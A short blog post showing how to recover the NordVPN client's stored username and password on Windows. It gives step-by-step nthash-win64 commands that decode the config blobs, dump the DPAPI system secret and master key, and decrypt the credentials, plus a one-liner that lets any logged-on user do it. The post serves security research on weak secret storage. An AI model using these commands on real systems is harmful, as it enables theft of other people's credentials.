Jan 272020

We now know that dpapi secrets are everywhere stored in various ways.

Lets have a look at the popular vpn client : NordVPN.
NordVPN stores its secrets (username/password) on a config file (xml format) and is using a machine scope (not good if you ask me…).

Lets see how to decrypt it.

1-Retrieve nordvpn user.config in c:\users\username\appdata\local\nordvpn\nordvpn.exe_url_xxxx\

2-Retrieve the base64 values for username and password

example below of a base64 string

3-Decode it to a hexa string

echo base64string | nthash-win64 /base64decodehexa

4-Save the hexa string to a file

echo hexastring | nthash-win64 /hexatofile

or … steps 2,3 and 4 can be done in one go (pipe in…pipe out…) like below

echo base64string | nthash-win64 /base64decodehexa | nthash-win64 /hexatofile

5-Retrieve the mk guid
nthash-win64 /decodeblob

6-Retrieve the dpapy system key

nthash-win64 /dumpsecret /input:dpapi_system /mode:machine /offline
(if machine key does not work, try user key)

7-Decrypt the (encrypted) masterkey

echo mydpapisyskey | nthash-win64 /decodemk /binary:c:\Windows\System32\Microsoft\ProtectS-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52

8-Finally, decrypt the dpapi blob

echo mymksha1key | nthash-win64 /decodeblob

or … steps 6,7 and 8 can be done in one go like below

NTHASH-win64.exe /dumpsecret /input:dpapi_system /mode:machine /offline | nthash-win64 /decodemk /binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52 | nthash-win64 /decodeblob

Note that, online, any user logged on that machine, could simple do the below

echo base64string | nthash-win64 /base64decodehexa | NTHASH-win64 /cryptunprotectdata

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>



Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.